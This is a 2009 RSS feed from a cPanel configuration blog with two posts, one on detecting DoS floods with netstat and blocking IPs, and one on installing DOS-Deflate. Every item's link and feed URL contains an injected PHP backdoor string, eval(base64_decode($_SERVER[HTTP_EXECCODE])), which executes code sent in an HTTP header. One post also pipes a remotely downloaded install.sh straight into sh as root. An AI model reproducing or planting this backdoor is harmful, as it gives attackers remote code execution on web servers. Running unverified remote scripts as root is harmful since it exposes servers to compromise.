<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>cPanelConfig - cPanel server configuration guide &#187; DOS</title>
	<atom:link href="http://www.cpanelconfig.com/tag/dos/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.cpanelconfig.com</link>
	<description>The complete guide to setup and manage a cPanel based server</description>
	<lastBuildDate>Fri, 17 Jul 2009 11:15:39 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Apache reading = DOS attack ?</title>
		<link>http://www.cpanelconfig.com/2007/12/17/apache-reading-dos-attack/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2007/12/17/apache-reading-dos-attack/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Mon, 17 Dec 2007 10:59:32 +0000</pubDate>
		<dc:creator>yolau</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[DOS]]></category>
		<category><![CDATA[flood]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/cpanel-security-related-articles/apache-reading-dos-attack/</guid>
		<description><![CDATA[If you are seeing many &#8220;? ..reading..&#8221; when your are clicking on Apache status in WHM  and your Apache server is slow, there is a chance that your http server is under a dos attach.




You can check this out by:

Log on your server as root
Type the fallowing command
 netstat -plan&#124;grep :80&#124;awk {&#8217;print $5&#8242;}&#124;cut -d: [...]]]></description>
			<content:encoded><![CDATA[<p>If you are seeing many &#8220;? ..reading..&#8221; when your are clicking on Apache status in WHM  and your Apache server is slow, there is a chance that your http server is under a dos attach.<br />
<!--adsense--><br />
You can check this out by:</p>
<ol>
<li>Log on your server as root</li>
<li>Type the fallowing command</li>
<blockquote><p> netstat -plan|grep :80|awk {&#8217;print $5&#8242;}|cut -d: -f 1|sort|uniq -c|sort -n</p></blockquote>
<p>You will see a list of IP&#8217;s with the number of connections each once has to your server.</p>
<li>If any IP&#8217;s have more then 100 connections then there is a chance that this is your attacker. Go ahead and block this IP using APF if you have it installed or CSF</li>
<p><!--adsense--></p>
<blockquote><p>apf -d IP<br />
or<br />
csf -d IP</p></blockquote>
</ol>
<p>Hope it helps !<br />
<!--adsense--><br />
If you have any questions don&#8217;t hesitate to leave a comment.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2007/12/17/apache-reading-dos-attack/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>How to mitigate DOS atacks with DOS-Deflate</title>
		<link>http://www.cpanelconfig.com/2007/09/21/how-to-mitigate-dos-atacks-with-dos-deflate/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2007/09/21/how-to-mitigate-dos-atacks-with-dos-deflate/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Fri, 21 Sep 2007 21:40:41 +0000</pubDate>
		<dc:creator>yolau</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[atacks]]></category>
		<category><![CDATA[cpanel]]></category>
		<category><![CDATA[DOS]]></category>
		<category><![CDATA[DOS-Deflate]]></category>
		<category><![CDATA[mitigate]]></category>
		<category><![CDATA[server]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/cpanel-security-related-articles/how-to-mitigate-dos-atacks-with-dos-deflate/</guid>
		<description><![CDATA[
What is DOS-Deflate?
(D)DoS Deflate is a shell script developed by Zaf, originally for use on MediaLayer servers to assist in combating denial of service attacks. However, it was seen to be very effective for our purpose, and therefore was released as a contribution to the web hosting community. (D)DoS Deflate is now used by not [...]]]></description>
			<content:encoded><![CDATA[<p><!--adsense--><br />
<strong>What is DOS-Deflate?</strong></p>
<p>(D)DoS Deflate is a shell script developed by Zaf, originally for use on MediaLayer servers to assist in combating denial of service attacks. However, it was seen to be very effective for our purpose, and therefore was released as a contribution to the web hosting community. (D)DoS Deflate is now used by not only many web hosts, but by many people who run their own servers looking for additional security in dealing with such attacks. </p>
<p><strong>How to install </strong></p>
<p>Installing DOS-Deflate is one of the simplest out there.</p>
<ol>
<li>Login to your server as root</li>
<li>Download the install script</li>
<blockquote><p>wget http://www.inetbase.com/scripts/ddos/install.sh</p></blockquote>
<li>Run the installer</li>
<blockquote><p>sh install.sh</p></blockquote>
</ol>
<p>DOS-Deflate should now be installed.<br />
<!--adsense--><br />
Please note that DOS-Deflate uses APF to ban IPs so you must have it installed for DOS-Deflate to work properly. I guide on how to install APF can be found <a href="http://www.cpanelconfig.com/cpanel-security-related-articles/install-apf-firewall/">here</a>.</p>
<p>Customizing DOS-Deflate is very easy. You have to edit /usr/local/ddos/ddos.conf with your favorite editor for example</p>
<blockquote><p>pico /usr/local/ddos/ddos.conf</p></blockquote>
<p>Every setting is explained in the configuration file so I will not go over them as the explanations are quite easy to fallow up.<br />
<!--adsense--><br />
If you run into any problems please leave a comment here and I&#8217;ll try to help out.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2007/09/21/how-to-mitigate-dos-atacks-with-dos-deflate/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
	</channel>
</rss>
